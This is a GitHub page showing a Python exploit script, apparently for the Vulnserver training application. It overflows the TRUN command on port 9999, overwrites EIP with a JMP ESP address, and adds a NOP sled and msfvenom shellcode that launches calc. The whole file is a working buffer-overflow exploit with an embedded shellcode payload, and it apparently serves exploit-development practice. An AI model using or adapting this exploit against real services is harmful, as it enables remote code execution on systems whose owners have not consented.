Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
53 lines (45 sloc) 1.89 KB
#!/usr/bin/python3
import socket
import subprocess
import struct
target_ip = "X.X.X.X"
target_port = 9999
def send_exploit(attack_string):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
response = s.recv(2048)
print(response.decode())
s.send(attack_string)
def make_buffer():
prepend = b"TRUN /.:/"
# offset found using boofuzz
pattern = b"A"*2003
# !mona find -type instr -s "jmp esp" -x X
eip = struct.pack("<I", 0x62501203)
nops = b"\x90"*25
# msfvenom -p windows/exec CMD="calc" -f python -b "\x00"
buf = b""
buf += b"\xdb\xd0\xbd\x32\xbc\xb0\xfd\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x30\x31\x68\x18\x83\xe8\xfc\x03\x68\x26\x5e"
buf += b"\x45\x01\xae\x1c\xa6\xfa\x2e\x41\x2e\x1f\x1f\x41\x54"
buf += b"\x6b\x0f\x71\x1e\x39\xa3\xfa\x72\xaa\x30\x8e\x5a\xdd"
buf += b"\xf1\x25\xbd\xd0\x02\x15\xfd\x73\x80\x64\xd2\x53\xb9"
buf += b"\xa6\x27\x95\xfe\xdb\xca\xc7\x57\x97\x79\xf8\xdc\xed"
buf += b"\x41\x73\xae\xe0\xc1\x60\x66\x02\xe3\x36\xfd\x5d\x23"
buf += b"\xb8\xd2\xd5\x6a\xa2\x37\xd3\x25\x59\x83\xaf\xb7\x8b"
buf += b"\xda\x50\x1b\xf2\xd3\xa2\x65\x32\xd3\x5c\x10\x4a\x20"
buf += b"\xe0\x23\x89\x5b\x3e\xa1\x0a\xfb\xb5\x11\xf7\xfa\x1a"
buf += b"\xc7\x7c\xf0\xd7\x83\xdb\x14\xe9\x40\x50\x20\x62\x67"
buf += b"\xb7\xa1\x30\x4c\x13\xea\xe3\xed\x02\x56\x45\x11\x54"
buf += b"\x39\x3a\xb7\x1e\xd7\x2f\xca\x7c\xbd\xae\x58\xfb\xf3"
buf += b"\xb1\x62\x04\xa3\xd9\x53\x8f\x2c\x9d\x6b\x5a\x09\x51"
buf += b"\x26\xc7\x3b\xfa\xef\x9d\x7e\x67\x10\x48\xbc\x9e\x93"
buf += b"\x79\x3c\x65\x8b\x0b\x39\x21\x0b\xe7\x33\x3a\xfe\x07"
buf += b"\xe0\x3b\x2b\x64\x67\xa8\xb7\x6b"
attack_string = prepend + pattern + eip + nops + buf
return attack_string
def main():
attack_string = make_buffer()
send_exploit(attack_string)
if __name__ == '__main__':
main()
You can’t perform that action at this time.